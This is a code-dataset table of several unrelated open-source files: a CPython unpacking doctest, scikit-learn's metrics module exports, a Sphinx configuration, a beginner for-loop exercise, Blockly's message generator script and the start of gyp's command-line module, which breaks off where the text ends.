repo_name stringlengths 5 100 | ref stringlengths 12 67 | path stringlengths 4 244 | copies stringlengths 1 8 | content stringlengths 0 1.05M ⌀ |
|---|---|---|---|---|
blacklin/kbengine | refs/heads/master | kbe/res/scripts/common/Lib/test/test_unpack.py | 174 | doctests = """
Unpack tuple
>>> t = (1, 2, 3)
>>> a, b, c = t
>>> a == 1 and b == 2 and c == 3
True
Unpack list
>>> l = [4, 5, 6]
>>> a, b, c = l
>>> a == 4 and b == 5 and c == 6
True
Unpack implied tuple
>>> a, b, c = 7, 8, 9
>>> a == 7 and b == 8 and c == 9
True
Unpack string... fun!
>>> a, b, c = 'one'
>>> a == 'o' and b == 'n' and c == 'e'
True
Unpack generic sequence
>>> class Seq:
... def __getitem__(self, i):
... if i >= 0 and i < 3: return i
... raise IndexError
...
>>> a, b, c = Seq()
>>> a == 0 and b == 1 and c == 2
True
Single element unpacking, with extra syntax
>>> st = (99,)
>>> sl = [100]
>>> a, = st
>>> a
99
>>> b, = sl
>>> b
100
Now for some failures
Unpacking non-sequence
>>> a, b, c = 7
Traceback (most recent call last):
...
TypeError: 'int' object is not iterable
Unpacking tuple of wrong size
>>> a, b = t
Traceback (most recent call last):
...
ValueError: too many values to unpack (expected 2)
Unpacking tuple of wrong size
>>> a, b = l
Traceback (most recent call last):
...
ValueError: too many values to unpack (expected 2)
Unpacking sequence too short
>>> a, b, c, d = Seq()
Traceback (most recent call last):
...
ValueError: need more than 3 values to unpack
Unpacking sequence too long
>>> a, b = Seq()
Traceback (most recent call last):
...
ValueError: too many values to unpack (expected 2)
Unpacking a sequence where the test for too long raises a different kind of
error
>>> class BozoError(Exception):
... pass
...
>>> class BadSeq:
... def __getitem__(self, i):
... if i >= 0 and i < 3:
... return i
... elif i == 3:
... raise BozoError
... else:
... raise IndexError
...
Trigger code while not expecting an IndexError (unpack sequence too long, wrong
error)
>>> a, b, c, d, e = BadSeq()
Traceback (most recent call last):
...
test.test_unpack.BozoError
Trigger code while expecting an IndexError (unpack sequence too short, wrong
error)
>>> a, b, c = BadSeq()
Traceback (most recent call last):
...
test.test_unpack.BozoError
"""
# doctest's harness scans a module-level __test__ mapping; each string
# value is searched for interactive examples to run.
__test__ = {'doctests' : doctests}
def test_main(verbose=False):
    """Run the doctest examples in this module via the regrtest driver."""
    from test import support, test_unpack
    support.run_doctest(test_unpack, verbose)


if __name__ == "__main__":
    test_main(verbose=True)
|
rahuldhote/scikit-learn | refs/heads/master | sklearn/metrics/__init__.py | 214 | """
The :mod:`sklearn.metrics` module includes score functions, performance metrics
and pairwise metrics and distance computations.
"""
from .ranking import auc
from .ranking import average_precision_score
from .ranking import coverage_error
from .ranking import label_ranking_average_precision_score
from .ranking import label_ranking_loss
from .ranking import precision_recall_curve
from .ranking import roc_auc_score
from .ranking import roc_curve
from .classification import accuracy_score
from .classification import classification_report
from .classification import cohen_kappa_score
from .classification import confusion_matrix
from .classification import f1_score
from .classification import fbeta_score
from .classification import hamming_loss
from .classification import hinge_loss
from .classification import jaccard_similarity_score
from .classification import log_loss
from .classification import matthews_corrcoef
from .classification import precision_recall_fscore_support
from .classification import precision_score
from .classification import recall_score
from .classification import zero_one_loss
from .classification import brier_score_loss
from . import cluster
from .cluster import adjusted_mutual_info_score
from .cluster import adjusted_rand_score
from .cluster import completeness_score
from .cluster import consensus_score
from .cluster import homogeneity_completeness_v_measure
from .cluster import homogeneity_score
from .cluster import mutual_info_score
from .cluster import normalized_mutual_info_score
from .cluster import silhouette_samples
from .cluster import silhouette_score
from .cluster import v_measure_score
from .pairwise import euclidean_distances
from .pairwise import pairwise_distances
from .pairwise import pairwise_distances_argmin
from .pairwise import pairwise_distances_argmin_min
from .pairwise import pairwise_kernels
from .regression import explained_variance_score
from .regression import mean_absolute_error
from .regression import mean_squared_error
from .regression import median_absolute_error
from .regression import r2_score
from .scorer import make_scorer
from .scorer import SCORERS
from .scorer import get_scorer
# Public API of sklearn.metrics.  Every name imported above appears here
# exactly once.
__all__ = [
    'accuracy_score',
    'adjusted_mutual_info_score',
    'adjusted_rand_score',
    'auc',
    'average_precision_score',
    'classification_report',
    'cluster',
    # cohen_kappa_score is imported above but was missing from __all__.
    'cohen_kappa_score',
    'completeness_score',
    'confusion_matrix',
    'consensus_score',
    'coverage_error',
    'euclidean_distances',
    'explained_variance_score',
    'f1_score',
    'fbeta_score',
    'get_scorer',
    'hamming_loss',
    'hinge_loss',
    'homogeneity_completeness_v_measure',
    'homogeneity_score',
    'jaccard_similarity_score',
    'label_ranking_average_precision_score',
    'label_ranking_loss',
    'log_loss',
    'make_scorer',
    'matthews_corrcoef',
    'mean_absolute_error',
    'mean_squared_error',
    'median_absolute_error',
    'mutual_info_score',
    'normalized_mutual_info_score',
    'pairwise_distances',
    'pairwise_distances_argmin',
    # was listed twice; duplicate entry removed
    'pairwise_distances_argmin_min',
    'pairwise_kernels',
    'precision_recall_curve',
    'precision_recall_fscore_support',
    'precision_score',
    'r2_score',
    'recall_score',
    'roc_auc_score',
    'roc_curve',
    'SCORERS',
    'silhouette_samples',
    'silhouette_score',
    'v_measure_score',
    'zero_one_loss',
    'brier_score_loss',
]
|
dslab-epfl/bugbase | refs/heads/master | doc/source/conf.py | 1 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Bugbase documentation build configuration file, created by
# sphinx-quickstart on Mon May 4 11:56:47 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import sphinx_rtd_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# Two levels up from doc/source is the repository root; adding it lets
# autodoc import the Bugbase packages being documented.
sys.path.insert(0, os.path.abspath('../..'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
# Sphinx extensions used for this build:
#   autodoc     - pull documentation from docstrings
#   doctest     - run doctest snippets embedded in the docs
#   todo        - render .. todo:: directives (see todo_include_todos below)
#   coverage    - report undocumented objects
#   viewcode    - link to highlighted source code
#   intersphinx - cross-reference other projects' documentation
extensions = [
    'sphinx.ext.autodoc',
    'sphinx.ext.doctest',
    'sphinx.ext.todo',
    'sphinx.ext.coverage',
    'sphinx.ext.viewcode',
    'sphinx.ext.intersphinx'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix(es) of source filenames.
# You can specify multiple suffixes as a list of strings:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'

# The encoding of source files.
# source_encoding = 'utf-8-sig'

# The master toctree document (index.rst is the documentation entry point).
master_doc = 'index'

# General information about the project.
project = 'Bugbase'
copyright = '2015, Benjamin Schubert, benjamin.schubert@epfl.ch'
author = 'Benjamin Schubert, benjamin.schubert@epfl.ch'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0'
# The full version, including alpha/beta/rc tags.
release = '1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []

# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False

# If true, `todo` and `todoList` produce output, else they produce nothing
# (requires the sphinx.ext.todo extension enabled above).
todo_include_todos = True

# -- Options for HTML output ----------------------------------------------

# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'

# Theme options are theme-specific and customize the look and feel of a theme
# further.  For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
# The Read the Docs theme ships its own template path.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr'
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'Bugbasedoc'
# -- Options for LaTeX output ---------------------------------------------
# All entries commented out: LaTeX output uses the Sphinx defaults.
latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    # 'papersize': 'letterpaper',
    # The font size ('10pt', '11pt' or '12pt').
    # 'pointsize': '10pt',
    # Additional stuff for the LaTeX preamble.
    # 'preamble': '',
    # Latex figure (float) alignment
    # 'figure_align': 'htbp',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
    (master_doc, 'Bugbase.tex', 'Bugbase Documentation',
     'Benjamin Schubert, benjamin.schubert@epfl.ch', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
# One manual page: (source start file, name, description, authors, section).
man_pages = [
    (master_doc, 'bugbase', 'Bugbase Documentation',
     [author], 1)
]

# If true, show URL addresses after external links.
# man_show_urls = False

# -- Options for Texinfo output -------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    (master_doc, 'Bugbase', 'Bugbase Documentation',
     author, 'Bugbase', 'One line description of project.',
     'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
# Sphinx appends rst_epilog to every source file, making the |project|
# substitution available everywhere in the docs.
rst_epilog = """.. |project| replace:: {0}""".format(project)
|
CptDemocracy/Python | refs/heads/master | MITx-6.00.1x-EDX-Introduction-to-Computer-Science/Week-2/Lecture-3/problem5a.py | 1 | """
Problem 5a.
In this problem you'll be given a chance to practice writing
some for loops.
Convert the following code into code that uses a for loop:
print 2
print 4
print 6
print 8
print 10
print "Goodbye!"
"""
# Same output as the five literal print statements in the prompt: the even
# numbers 2 through 10, one per line, then a farewell.  The parenthesized
# print(...) form behaves identically under Python 2 and is also valid
# Python 3 (the original bare `print str(n)` statement is a SyntaxError
# on Python 3).
for n in range(2, 11, 2):
    print(str(n))
print('Goodbye!')
|
mbrinkmeier/AbbozzaCore | refs/heads/master | build/classes/js/lib/blockly/i18n/create_messages.py | 128 | #!/usr/bin/python
# Generate .js files defining Blockly core and language messages.
#
# Copyright 2013 Google Inc.
# https://developers.google.com/blockly/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import codecs
import os
import re
import sys
from common import read_json_file
# Matches a single LF or CR anywhere in a message value; used below to
# reject newlines in the source language and strip them (with a warning)
# from target languages, since each message is emitted on one JS line.
_NEWLINE_PATTERN = re.compile('[\n\r]')
def string_is_ascii(s):
  """Return True iff *s* contains only ASCII characters.

  Encoding to ASCII raises UnicodeEncodeError exactly when a non-ASCII
  character is present, and works for both Python 2 unicode and Python 3
  str.  (The original s.decode('ascii') is an AttributeError on Python 3
  str, and on Python 2 byte strings raised UnicodeDecodeError, which the
  except clause did not catch.)
  """
  try:
    s.encode('ascii')
    return True
  except UnicodeEncodeError:
    return False
def main():
  """Generate .js files defining Blockly core and language messages.

  Reads the source-language and synonym .json files, then, for each
  target-language .json file given on the command line, writes a
  <lang>.js file to --output_dir containing one Blockly.Msg assignment
  per key, falling back to the source-language value (marked
  '// untranslated') when the target file lacks a key.
  """
  # Process command-line arguments.
  parser = argparse.ArgumentParser(description='Convert JSON files to JS.')
  parser.add_argument('--source_lang', default='en',
                      help='ISO 639-1 source language code')
  parser.add_argument('--source_lang_file',
                      default=os.path.join('json', 'en.json'),
                      help='Path to .json file for source language')
  parser.add_argument('--source_synonym_file',
                      default=os.path.join('json', 'synonyms.json'),
                      help='Path to .json file with synonym definitions')
  parser.add_argument('--output_dir', default='js/',
                      help='relative directory for output files')
  parser.add_argument('--key_file', default='keys.json',
                      help='relative path to input keys file')
  parser.add_argument('--quiet', action='store_true', default=False,
                      help='do not write anything to standard output')
  parser.add_argument('files', nargs='+', help='input files')
  args = parser.parse_args()
  if not args.output_dir.endswith(os.path.sep):
    args.output_dir += os.path.sep

  # Read in source language .json file, which provides any values missing
  # in target languages' .json files.
  source_defs = read_json_file(os.path.join(os.curdir, args.source_lang_file))
  # Make sure the source file doesn't contain a newline or carriage return.
  for key, value in source_defs.items():
    if _NEWLINE_PATTERN.search(value):
      print('ERROR: definition of {0} in {1} contained a newline character.'.
            format(key, args.source_lang_file))
      sys.exit(1)
  # FIX: sorted() returns a new list and works on both Python 2 and 3;
  # the original keys().sort() fails on Python 3, where keys() is a view.
  sorted_keys = sorted(source_defs)

  # Read in synonyms file, which must be output in every language.
  synonym_defs = read_json_file(os.path.join(
      os.curdir, args.source_synonym_file))
  synonym_text = '\n'.join(['Blockly.Msg.{0} = Blockly.Msg.{1};'.format(
      key, synonym_defs[key]) for key in synonym_defs])

  # Create each output file.
  for arg_file in args.files:
    (_, filename) = os.path.split(arg_file)
    target_lang = filename[:filename.index('.')]
    if target_lang not in ('qqq', 'keys', 'synonyms'):
      target_defs = read_json_file(os.path.join(os.curdir, arg_file))

      # Verify that keys are 'ascii'.
      bad_keys = [key for key in target_defs if not string_is_ascii(key)]
      if bad_keys:
        print(u'These keys in {0} contain non ascii characters: {1}'.format(
            filename, ', '.join(bad_keys)))

      # If there's a '\n' or '\r', remove it and print a warning.
      for key, value in target_defs.items():
        if _NEWLINE_PATTERN.search(value):
          print(u'WARNING: definition of {0} in {1} contained '
                'a newline character.'.
                format(key, arg_file))
          target_defs[key] = _NEWLINE_PATTERN.sub(' ', value)

      # Output file.
      outname = os.path.join(os.curdir, args.output_dir, target_lang + '.js')
      with codecs.open(outname, 'w', 'utf-8') as outfile:
        outfile.write(
            """// This file was automatically generated. Do not modify.
'use strict';
goog.provide('Blockly.Msg.{0}');
goog.require('Blockly.Msg');
""".format(target_lang.replace('-', '.')))
        # For each key in the source language file, output the target value
        # if present; otherwise, output the source language value with a
        # warning comment.
        for key in sorted_keys:
          if key in target_defs:
            value = target_defs[key]
            comment = ''
            # Remove so that leftovers identify target-only keys below.
            del target_defs[key]
          else:
            value = source_defs[key]
            comment = ' // untranslated'
          value = value.replace('"', '\\"')
          outfile.write(u'Blockly.Msg.{0} = "{1}";{2}\n'.format(
              key, value, comment))

        # Announce any keys defined only for target language.
        if target_defs:
          extra_keys = [key for key in target_defs if key not in synonym_defs]
          synonym_keys = [key for key in target_defs if key in synonym_defs]
          if not args.quiet:
            if extra_keys:
              print(u'These extra keys appeared in {0}: {1}'.format(
                  filename, ', '.join(extra_keys)))
            if synonym_keys:
              print(u'These synonym keys appeared in {0}: {1}'.format(
                  filename, ', '.join(synonym_keys)))
        outfile.write(synonym_text)

      if not args.quiet:
        print('Created {0}.'.format(outname))
# Standard script entry point.
if __name__ == '__main__':
  main()
|
zhengyongbo/phantomjs | refs/heads/master | src/breakpad/src/tools/gyp/pylib/gyp/__init__.py | 137 | #!/usr/bin/python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import copy
import gyp.input
import optparse
import os.path
import re
import shlex
import sys
# Default debug modes for GYP.
# Maps an enabled debug-mode name to a truthy value; populated from the
# -d/--debug command-line flags in main() and consulted by DebugOutput().
debug = {}

# List of "official" debug modes, but you can use anything you like.
DEBUG_GENERAL = 'general'
DEBUG_VARIABLES = 'variables'
DEBUG_INCLUDES = 'includes'
def DebugOutput(mode, message):
  """Print |message| to stdout, prefixed by |mode|, when that debug mode
  is enabled in gyp.debug.

  Uses the parenthesized print(...) form, which behaves identically on
  Python 2 and is also valid Python 3 (the original bare print statement
  is a SyntaxError there), and tests membership on the dict directly
  instead of materializing .keys().
  """
  if mode in gyp.debug:
    print("%s: %s" % (mode.upper(), message))
def FindBuildFiles():
  """Return the names of all .gyp files in the current working directory,
  in os.listdir order."""
  extension = '.gyp'
  # str.endswith is clearer than the original slice comparison, and the
  # comprehension avoids shadowing the `file` builtin as the original
  # loop variable did.
  return [name for name in os.listdir(os.getcwd())
          if name.endswith(extension)]
def Load(build_files, format, default_variables=None,
         includes=None, depth='.', params=None, check=False):
  """
  Loads one or more specified build files.
  default_variables and includes will be copied before use.
  Returns the generator for the specified format and the
  data returned by loading the specified build files.
  """
  # None sentinels replace the original mutable default arguments
  # ({} / [] / {}), so state can never leak between calls; callers that
  # omit these arguments see identical behavior.
  default_variables = copy.copy(default_variables) if default_variables else {}
  if includes is None:
    includes = []
  if params is None:
    params = {}

  # Default variables provided by this program and its modules should be
  # named WITH_CAPITAL_LETTERS to provide a distinct "best practice"
  # namespace, avoiding collisions with user and automatic variables.
  default_variables['GENERATOR'] = format

  generator_name = 'gyp.generator.' + format
  # These parameters are passed in order (as opposed to by key)
  # because ActivePython cannot handle key parameters to __import__.
  generator = __import__(generator_name, globals(), locals(), generator_name)
  default_variables.update(generator.generator_default_variables)

  # Give the generator the opportunity to set additional variables based on
  # the params it will receive in the output phase.
  if getattr(generator, 'CalculateVariables', None):
    generator.CalculateVariables(default_variables, params)

  # Fetch the generator-specific info that gets fed to input; we use getattr
  # so we can default things and the generators only have to provide what
  # they need.
  generator_input_info = {
      'generator_wants_absolute_build_file_paths':
          getattr(generator, 'generator_wants_absolute_build_file_paths',
                  False),
      'generator_handles_variants':
          getattr(generator, 'generator_handles_variants', False),
      'non_configuration_keys':
          getattr(generator, 'generator_additional_non_configuration_keys',
                  []),
      'path_sections':
          getattr(generator, 'generator_additional_path_sections', []),
      'extra_sources_for_rules':
          getattr(generator, 'generator_extra_sources_for_rules', []),
      'generator_supports_multiple_toolsets':
          getattr(generator, 'generator_supports_multiple_toolsets', False),
  }

  # Process the input specific to this generator.
  result = gyp.input.Load(build_files, default_variables, includes[:],
                          depth, generator_input_info, check)
  return [generator] + result
def NameValueListToDict(name_value_list):
  """
  Takes an array of strings of the form 'NAME=VALUE' and creates a dictionary
  of the pairs.  If a string is simply NAME, then the value in the dictionary
  is set to True.  If VALUE can be converted to an integer, it is.
  """
  result = {}
  for entry in name_value_list:
    name, sep, raw_value = entry.partition('=')
    if not sep:
      # Bare NAME with no '=': treat as a boolean flag.
      result[name] = True
      continue
    # Prefer an integer value when the text parses as one.
    try:
      result[name] = int(raw_value)
    except ValueError:
      result[name] = raw_value
  return result
def ShlexEnv(env_name):
  """Shell-split the value of environment variable |env_name| into a list.

  An unset variable yields []; a variable set to the empty string is
  returned unchanged (still falsy), matching the original behavior.
  """
  flags = os.environ.get(env_name, [])
  return shlex.split(flags) if flags else flags
def FormatOpt(opt, value):
  """Render an option/value pair as it would appear on a command line.

  Long options ('--foo') become '--foo=value'; short options ('-D') get
  the value concatenated directly ('-Dvalue').
  """
  if not opt.startswith('--'):
    return opt + value
  return '%s=%s' % (opt, value)
def RegenerateAppendFlag(flag, values, predicate, env_name, options):
  """Regenerate a list of command line flags, for an option of action='append'.

  The |env_name|, if given, is checked in the environment and used to generate
  an initial list of options, then the options that were specified on the
  command line (given in |values|) are appended.  This matches the handling of
  environment variables and command line flags where command line flags
  override the environment, while not requiring the environment to be set when
  the flags are used again.
  """
  # Environment-derived values come first, then explicit command-line values.
  sources = []
  if options.use_environment and env_name:
    sources.append(ShlexEnv(env_name))
  if values:
    sources.append(values)
  flags = []
  for source in sources:
    flags.extend(FormatOpt(flag, predicate(v)) for v in source)
  return flags
def RegenerateFlags(options):
  """Given a parsed options object, and taking the environment variables into
  account, returns a list of flags that should regenerate an equivalent
  options object (even in the absence of the environment variables.)

  Any path options will be normalized relative to depth.

  The format flag is not included, as it is assumed the calling generator
  will set that as appropriate.
  """
  def FixPath(path):
    # Normalize a path-valued flag relative to the configured depth.
    path = gyp.common.FixIfRelativePath(path, options.depth)
    if not path:
      return os.path.curdir
    return path

  def Noop(value):
    return value

  # We always want to ignore the environment when regenerating, to avoid
  # duplicate or changed flags in the environment at the time of regeneration.
  flags = ['--ignore-environment']
  # .items() (rather than the Python 2-only .iteritems()) works on both
  # Python 2 and Python 3.
  for name, metadata in options._regeneration_metadata.items():
    opt = metadata['opt']
    value = getattr(options, name)
    value_predicate = metadata['type'] == 'path' and FixPath or Noop
    action = metadata['action']
    env_name = metadata['env_name']
    if action == 'append':
      flags.extend(RegenerateAppendFlag(opt, value, value_predicate,
                                        env_name, options))
    elif action in ('store', None):  # None is a synonym for 'store'.
      if value:
        flags.append(FormatOpt(opt, value_predicate(value)))
      elif options.use_environment and env_name and os.environ.get(env_name):
        flags.append(FormatOpt(opt, value_predicate(os.environ.get(env_name))))
    elif action in ('store_true', 'store_false'):
      if ((action == 'store_true' and value) or
          (action == 'store_false' and not value)):
        flags.append(opt)
      elif options.use_environment and env_name:
        # sys.stderr.write replaces the Python 2-only `print >>sys.stderr`.
        sys.stderr.write('Warning: environment regeneration unimplemented '
                         'for %s flag %r env_name %r\n' % (action, opt,
                                                           env_name))
    else:
      sys.stderr.write('Warning: regeneration unimplemented for action %r '
                       'flag %r\n' % (action, opt))
  return flags
class RegeneratableOptionParser(optparse.OptionParser):
  """An OptionParser that records, per destination, the metadata needed to
  rebuild an equivalent command line later (see RegenerateFlags)."""

  def __init__(self):
    # Maps option dest -> {'action', 'type', 'env_name', 'opt'}.
    self.__regeneratable_options = {}
    optparse.OptionParser.__init__(self)

  def add_option(self, *args, **kw):
    """Add an option to the parser.

    This accepts the same arguments as OptionParser.add_option, plus the
    following:
      regenerate: can be set to False to prevent this option from being
          included in regeneration.
      env_name: name of environment variable that additional values for
          this option come from.
      type: adds type='path', to tell the regenerator that the values of
          this option need to be made relative to options.depth
    """
    env_name = kw.pop('env_name', None)
    if 'dest' in kw and kw.pop('regenerate', True):
      dest = kw['dest']
      opt_type = kw.get('type')
      if opt_type == 'path':
        # optparse itself has no 'path' type: hand it a plain string and
        # remember the real type for regeneration.
        kw['type'] = 'string'
      self.__regeneratable_options[dest] = {
          'action': kw.get('action'),
          'type': opt_type,
          'env_name': env_name,
          'opt': args[0],
      }
    optparse.OptionParser.add_option(self, *args, **kw)

  def parse_args(self, *args):
    values, args = optparse.OptionParser.parse_args(self, *args)
    # Expose the recorded metadata on the values object for RegenerateFlags.
    values._regeneration_metadata = self.__regeneratable_options
    return values, args
def main(args):
my_name = os.path.basename(sys.argv[0])
parser = RegeneratableOptionParser()
usage = 'usage: %s [options ...] [build_file ...]'
parser.set_usage(usage.replace('%s', '%prog'))
parser.add_option('-D', dest='defines', action='append', metavar='VAR=VAL',
env_name='GYP_DEFINES',
help='sets variable VAR to value VAL')
parser.add_option('-f', '--format', dest='formats', action='append',
env_name='GYP_GENERATORS', regenerate=False,
help='output formats to generate')
parser.add_option('--msvs-version', dest='msvs_version',
regenerate=False,
help='Deprecated; use -G msvs_version=MSVS_VERSION instead')
parser.add_option('-I', '--include', dest='includes', action='append',
metavar='INCLUDE', type='path',
help='files to include in all loaded .gyp files')
parser.add_option('--depth', dest='depth', metavar='PATH', type='path',
help='set DEPTH gyp variable to a relative path to PATH')
parser.add_option('-d', '--debug', dest='debug', metavar='DEBUGMODE',
action='append', default=[], help='turn on a debugging '
'mode for debugging GYP. Supported modes are "variables" '
'and "general"')
parser.add_option('-S', '--suffix', dest='suffix', default='',
help='suffix to add to generated files')
parser.add_option('-G', dest='generator_flags', action='append', default=[],
metavar='FLAG=VAL', env_name='GYP_GENERATOR_FLAGS',
help='sets generator flag FLAG to VAL')
parser.add_option('--generator-output', dest='generator_output',
action='store', default=None, metavar='DIR', type='path',
env_name='GYP_GENERATOR_OUTPUT',
help='puts generated build files under DIR')
parser.add_option('--ignore-environment', dest='use_environment',
action='store_false', default=True, regenerate=False,
help='do not read options from environment variables')
parser.add_option('--check', dest='check', action='store_true',
help='check format of gyp files')
# We read a few things from ~/.gyp, so set up a var for that.
home_vars = ['HOME']
if sys.platform in ('cygwin', 'win32'):
home_vars.append('USERPROFILE')
home = None
for home_var in home_vars:
home = os.getenv(home_var)
if home != None:
break
home_dot_gyp = None
if home != None:
home_dot_gyp = os.path.join(home, '.gyp')
if not os.path.exists(home_dot_gyp):
home_dot_gyp = None
# TODO(thomasvl): add support for ~/.gyp/defaults
(options, build_files_arg) = parser.parse_args(args)
build_files = build_files_arg
if not options.formats:
# If no format was given on the command line, then check the env variable.
generate_formats = []
if options.use_environment:
generate_formats = os.environ.get('GYP_GENERATORS', [])
if generate_formats:
generate_formats = re.split('[\s,]', generate_formats)
if generate_formats:
options.formats = generate_formats
else:
# Nothing in the variable, default based on platform.
options.formats = [ {'darwin': 'xcode',
'win32': 'msvs',
'cygwin': 'msvs',
'freebsd7': 'make',
'freebsd8': 'make',
'linux2': 'scons',}[sys.platform] ]
if not options.generator_output and options.use_environment:
g_o = os.environ.get('GYP_GENERATOR_OUTPUT')
if g_o:
options.generator_output = g_o
for mode in options.debug:
gyp.debug[mode] = 1
# Do an extra check to avoid work when we're not debugging.
if DEBUG_GENERAL in gyp.debug.keys():
DebugOutput(DEBUG_GENERAL, 'running with these options:')
for (option, value) in options.__dict__.items():
if option[0] == '_':
continue
if isinstance(value, basestring):
DebugOutput(DEBUG_GENERAL, " %s: '%s'" % (option, value))
else:
DebugOutput(DEBUG_GENERAL, " %s: %s" % (option, str(value)))
if not build_files:
build_files = FindBuildFiles()
if not build_files:
print >>sys.stderr, (usage + '\n\n%s: error: no build_file') % \
(my_name, my_name)
return 1
# TODO(mark): Chromium-specific hack!
# For Chromium, the gyp "depth" variable should always be a relative path
# to Chromium's top-level "src" directory. If no depth variable was set
# on the command line, try to find a "src" directory by looking at the
# absolute path to each build file's directory. The first "src" component
# found will be treated as though it were the path used for --depth.
if not options.depth:
for build_file in build_files:
build_file_dir = os.path.abspath(os.path.dirname(build_file))
build_file_dir_components = build_file_dir.split(os.path.sep)
components_len = len(build_file_dir_components)
for index in xrange(components_len - 1, -1, -1):
if build_file_dir_components[index] == 'src':
options.depth = os.path.sep.join(build_file_dir_components)
break
del build_file_dir_components[index]
# If the inner loop found something, break without advancing to another
# build file.
if options.depth:
break
if not options.depth:
raise Exception, \
'Could not automatically locate src directory. This is a ' + \
'temporary Chromium feature that will be removed. Use ' + \
